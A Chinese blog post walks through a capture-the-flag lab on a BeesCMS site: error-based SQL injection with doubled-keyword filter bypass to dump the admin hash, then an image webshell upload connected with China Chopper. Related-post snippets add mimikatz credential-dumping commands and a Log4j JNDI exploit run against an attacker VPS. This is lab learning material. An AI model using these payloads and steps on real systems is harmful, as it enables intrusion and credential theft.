封神台-getshell

最新推荐文章于 2023-11-19 15:17:00 发布
最新推荐文章于 2023-11-19 15:17:00 发布
阅读量393 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xixihahawuwu/article/details/110198046
版权

在这里插入图片描述
有个小提示
进入靶场
御剑扫描一下
在这里插入图片描述
我们得到了一个admin/login.php
这个看着就很敏感。猜测是管理员的登录界面在这里插入图片描述
访问进去果然是管理员的登录界面
我们转到虚拟机中去,使用bp抓下包
在这里插入图片描述这里可能有的盆友和我一样,一开始验证码的模块没有显示出来。得调一下比例才可以把验证码的框显示出来。虚拟机浏览器比例的问题
在这里插入图片描述输入用户名密码验证码,抓包在这里插入图片描述
发送到repeater模块
寻找注入点
先尝试着在用户名处修改在这里插入图片描述

在这里插入图片描述

存在注入点。这里有一个问题,就是我在第一次抓包修改用户名上传后返回的提示信息是验证码不正确,猜测这里应该有一个时间限制会自动刷新验证码,所以建议在输入用户名的密码后,输入验证码前,将验证码刷新后在输入,点击登录抓包
先猜测字段
使用order by语句在这里插入图片描述
当参数为6时报错
在这里插入图片描述
从回显信息我们可以知道筛选字段数为5,
select id,admin_name,admin_password,admin_purview,is_disable from bees_admin where admin_name=‘admin’ order by 6#’ limit 0,1
筛选字段为id,admin_name,admin_password,admin_purview,is_disable
从admin_name表中筛选
爆一下回显字段
使用联合查询
Union select 1,2,3,4,5 在这里插入图片描述
在这里插入图片描述
根据回显我们可以知道关键字被过滤了、、、、
尝试下双写绕过在这里插入图片描述
在这里插入图片描述
Union绕过失败,可能是我方式弄错了,这里就不试了在这里插入图片描述
在这里插入图片描述
Select绕过成功,但是没有回显字段
这边用到一个报错注入extractvalue(1,‘~’)

查询数据库user’ a and nd extractvalue(1,concat(’’,(database()),’’)) #在这里插入图片描述
在这里插入图片描述
得到数据库名bees
接下来要查询所有的数据表
需要注意的是,extractvalue(1,‘~’)注入能查询的字符串最大长度为32
但我们之前也知道了,网站对我们进行了一个关键字过滤,需要双写来绕过才行
也就是说我们需要解决查询字符串长度的问题
我们需要使用substr()函数来截取字符串
输入查询语句
a and nd extractvalue(1,substr(concat(’~’,(selselectect group_concat(table_name) fr from om information_schema.tables w where here table_schema like database()),’~’),1,30)) #通过调整substr中的len参数来获取所有的数据表
在这里插入图片描述
在这里插入图片描述
之前我们得到了五个字段id,admin_name,admin_password,admin_purview,is_disable
我们从bees_admin中查询admin_name和admin_password
注入a and nd extractvalue(1,concat(’~’,(selselectect admin_name fr from om bees_admin limit 1),’~’)) #
在这里插入图片描述
在这里插入图片描述
用户名是我们之前猜测的admin
注入a and nd extractvalue(1,substr(concat(’~’,(selselectect admin_password fr from om bees_admin limit 1),’~’),10)) #
这里依旧调整参数来不断获取参数
在这里插入图片描述参数为1 时
在这里插入图片描述

2~6时在这里插入图片描述
在这里插入图片描述
7时不回显
8~10在这里插入图片描述
再往后查询要么不回显,要么就是和8~10时一样的字符
最后一个一个md5解密字符串
得到
在这里插入图片描述
也就是说管理员密码为admin
登录后台在这里插入图片描述
成功进入后台在这里插入图片描述
在上传图片管理处可以看到我们可以修改图片,重新上传。
这里就用图片木马上传,抓包修改后缀为.php
在这里插入图片描述
在这里插入图片描述
懵逼了。。。。。
居然没有返回文件位置
返回浏览器查看。文件已经上传上去了
在这里插入图片描述
吓死了。还以为又挂了
点击图片
在这里插入图片描述
Url返回文件位置
菜刀连接,
Flag在c盘下在这里插入图片描述在这里插入图片描述

。。。。
这个居然还是个假的在这里插入图片描述
正确的flag在这里

一名无聊的网友
关注
神台----尤里的复仇I-第七章:GET THE PASS!
正在学习的路上...
07-19 1226
继续上一章的远程桌面连接,在C盘下找到这两个文件。 但是无权限打开。右键属性-安全。进行权限设置。 压缩包需要密码,文本里提示 使用minikatz工具,得到密码 命令:privilege::debuug ----提升权限 sekurlsa::logonPasswords----获取登陆用户密码 ...
神台(尤里的复仇Ⅱ 回归)绕过防护getshell
Bu2n的博客
01-05 3524
解题思路 习惯在url后加admin,看是不是管理后台。 一看发现是,就不用目录扫描工具了 填入正确的验证码,抓包输入',查看有无报错 发现报错了,存在报错注入,看报错描述可以知道是字符型注入 查看当前数据库 payload ' or extractvalue(1,concat(0x7e,database()))%23 查看当前库的所有表 payload ' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from info
神台-尤里的复仇II 回归sql-注入绕过防护getshell
m0_72592923的博客
01-14 688
神台-尤里的复仇II 回归sql-注入绕过防护getshell
神台靶场-sql-注入绕过防护getshell
weixin_43446292的博客
03-10 5563
url为http://rhiq8003.ia.aqlab.cn/bees/,此页面尝试sql注入,不成功;在路径后面加admin可以跳转到管理员登录界面, http://rhiq8003.ia.aqlab.cn/bees/admin 在登录框测试sql注入,输入admin’/123456(直接使用admin/admin即可成功登录) 报错,存在字符型注入,使用报错注入进行测试,根据响应结果可知对and过滤,使用双写 admin’ an and d updatexml(1,concat(0x7e,(sel
神台靶场学习-sql-注入绕过防护getshell
buggun6的博客
11-19 410
很好,没花啥功夫就找到了上传点,要求我们只允许上传的图片类型:gif|jpeg|png|jpg|bmp。总结:这次靶场个人感觉质量还是挺高的,和之前省赛的题有点像, 自己要坚持努力学习!好的进入后台了,现在要找flag很明显就不得不找找文件上传点写码上传试试了。很明显没有返回我们想要的东西,联合注入这条路估计是行不通了。ok,既然拿到用户名和密码了,不直接登录还有其他选项吗。解密发现密码也是admin,好家伙,弱口令是吧(nice,报错注入可以,我们发现数据库了。
掌控者-神台-Apache Log4j任意代码执行复现
weixin_43821278的博客
04-06 5740
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 Apache Log4j任意代码执行复现一、工具二、靶场三、步骤总结 一、工具 JNDIExploit-1.2-SNAPSHOT.jar 二、靶场 看网页源码 猜测就是username和password为注入点 三、步骤 vps有java环境 java -jar JNDIExploit-1.2-SNAPSHOT.jar -i vps的IP 成功运行 向密码框填入${jndi:ldap://vps的IP:1389/Basic/Comm.
神台-杂项8:奇怪的短信
最新发布
03-11
随波逐流工具,一个非常好用的解码工具
神演义--------------------.pdf
03-27
但是,考虑到标题中提到了“神演义”,我们可以围绕“神演义”这一主题来展开相关的知识点。 《神演义》是中国古代小说的一部重要作品,由明代小说家许仲琳编著。作品以商末周初的历史事件为背景,以武王伐纣...
神台----尤里的复仇I-第六章:SYSTEM!POWER!
正在学习的路上...
07-19 1508
通过上一章,上传的shell,使用菜刀连接 右键点击 输入命令 whoami 权限不足,这里需要用到提权工具,工具在 就不用再上传了。 右键点击cmd.exe,打开虚拟终端,输入whoami,可以看到当前用户。 尝试创建用户命令: net user 110 110 /add 还是权限不足。 这是因为cmd需要用到外部接口wscript.shell。 但是wscript.shell仍然...
神台----尤里的复仇I-第二章:遇到阻难!绕过WAF过滤!
正在学习的路上...
07-18 3520
1.找注入点 进去之后,查看新闻,一般在这里有注入点。 输入 ?id=168 and 1=1 过滤了一些关键字,通过测试没有过滤 == order by == 2.猜列数、报显示位 通过测试,发现查询了10列 ?id=171 order by 10 ?id=466454 select 1,2 ------将id设为一个不存在的数,看显示位 3.查看数据库版本和当前数据库名 ?id=1...
登录别人的账户(仅在神台靶场).mp4
04-07
这个教程仅在神台靶场可用,如在其他网站使用,否则属于违法行为,后果自负,本教程仅做参考,真正攻破防火墙属于违法行为
神台-掌控者新靶场 - Kali系列4题
热门推荐
weixin_43821278的博客
03-11 1万+
新靶场 - Kali系列【4题】 Kali渗透 - Sqlmap实操靶场
掌控者-神台靶场-萌新也能找到CMS漏洞
为了低调的博客
09-15 628
这个靶场压根没有flag有的话也是错误的,因为你可以看到通关的人数,从始至终都是那一个人a通关了,在这个靶场我们可以有挺多漏洞,所以只要你发现漏洞了你就可以给你自己一个大拇指赞一下了那个flag压根找不到。由于自己懒一点这里就不写教程了都是一些很简单的漏洞大家可以尝试一下!
【代码审计初探】beescms v4.0_R SQL
wodafa的博客
02-20 1640
本文原创作者: 0h1in9e,本文属i春秋原创奖励计划,未经许可禁止转载! 0x01 前言 前段时间去尝试审计一款cms系统,恰巧在补天上看到有Beescms相关漏洞,于是去官网下载了个学着审计了下。后来找出了Bypass 全局防护的SQL Injection .当时心情 激动地去补天提交。结果悲催的是在我提交的前几天有人提交了。下面进入正题,大神请绕道! 0x02 目标
神台靶场 绕过防护getshell
devil8123665的博客
09-24 4353
神台 https://hack.zkaq.cn/battle 靶场 http://59.63.200.79:8003/bees/ 一 爬取方法 1 针对本题目而言,是很简单的,只需要暴出站点的目录就能在根目录下找到flag.txt 御剑扫描:需要在御剑的字典中添加flag.txt等相关关键字 访问链接即可获得flag值。 2 或者使用其他的爬虫或者是扫描工具只要能获的站点目录,就能找到flag.txt 二 注入方法 1 通过kali dirb 暴出目录,找到http://59.6.
extractvalue报错注入
bangyan3903的博客
08-18 3552
查看源码 $uagent = $_SERVER['HTTP_USER_AGENT']; ………… $uname = check_input($_POST['uname']); $passwd = check_input($_POST['passwd']); ………… $sql="SELECT users.username, users.password FROM users...
注入(一)
tomyyyyy
06-28 293
eg: 例子 第一步,判断是否存在sql注入漏洞 构造 ?id=1 and 1=1 ,回车 页面返回正常 构造 ?id=1 and 1=2 ,回车 页面不正常,初步判断这里 可能 存在一个注入漏洞 第二步:判断字段数 构造 ?id=1 and 1=1 order by 1 回车 页面正常 构造 ?id=1 and 1=1 order by 2 回车 页面正常 构造 ?id=1 and 1=1 o...
2019网络空间竞赛 Misc writeup 神台 - 掌控安全在线靶场
Senimo
10-29 2052
2019网络空间竞赛 Misc writeup 神台 - 掌控安全在线靶场编码编码与密码拥有渗透测试思维 编码 Rank: 5 Tips: key形式为flag{} flag和括号都要提交。 %e7%ac%ac%e4%b8%80%e5%85%b3%e7%9a%84key%e6%98%afflag%7bwelcome%7d 判断给出的为URL编码,在线URL解码得到:第一关的key是flag{we...
神台----尤里的复仇I-第三章:这个后台能识别登录者…
正在学习的路上...
07-18 1931
根据提示,真正的后台地址为admin123,输入上一关的账号、密码进去。 分析代码: 从请求头中拿到Referer,并赋值给ComeUrl。 判断ComeUrl是否为空,若是空,则表明是直接输入地址访问。本题不允许 ComeUrl不为空, 读取Host,并在前面拼接 http:// 赋值给cUrl,如果ComeUrl有 " : ",表明有端口号,在为cUrl 加上端口号。 最后判断cUrl和...
c4d修神记:零基础到三维神 下载
01-05
"c4d修神记:零基础到三维神"是一本关于学习Cinema 4D(简称C4D)软件的书籍。C4D是一款强大的三维建模、动画和渲染软件,广泛应用于电影、游戏、广告等领域。该书以零基础的读者为目标群体,旨在通过系统的教程和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一名无聊的网友

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值